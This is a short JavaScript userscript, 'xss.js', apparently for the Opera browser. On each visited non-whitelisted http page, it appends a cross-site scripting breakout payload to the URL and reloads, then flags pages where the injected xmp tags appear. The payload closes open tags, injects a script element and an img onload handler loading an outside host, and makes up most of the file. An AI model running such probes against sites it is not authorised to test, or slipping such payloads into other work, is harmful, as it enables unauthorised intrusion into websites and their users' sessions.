xss.js

(function(w,l){
  //return;
  var excludes = ['google.com'].join('|');
  var trusted = ['dragonfly.opera.com','bit.ly','delicious.com','www.google.co.jp','gyazo.com','delicious.com','google.com','lingr.com','www.w3.org','ashula.info','fastladder.com','www.opera.com','opera-users.jp','puchi.co','oflo.in','ofton.in','opera-wiki.com','localhost','browser-festa.jp'
  ].join('|');
  if ( !l.protocol.match(/http/)
       || ( w.parent !== w )
       || ( l.hostname.match(new RegExp('(' + excludes + ')$' )))
       || ( l.hostname.match(new RegExp('(' + trusted + ')$' )))
    ){
    return;
  }
  w.addEventListener('load',function(){
    var penetrate = '#\'><xmp>"><xmp></xmp></xmp></script></iframe></a></div></div></div><script>alert(2)</script><img/src="http://puchi.co/qb2.jpg"onload="alert(4);">?#<meta content="/';
    if ( l.hash != null && ( l.hash.indexOf('xmp') !== -1 ) ) {
      if ( w.document.getElementsByTagName('xmp').length > 0 ) {
        alert('maybe');
      }
    }
    else {
      l.href += penetrate;
      l.reload();
    }
  }, false );
}( window, location ) );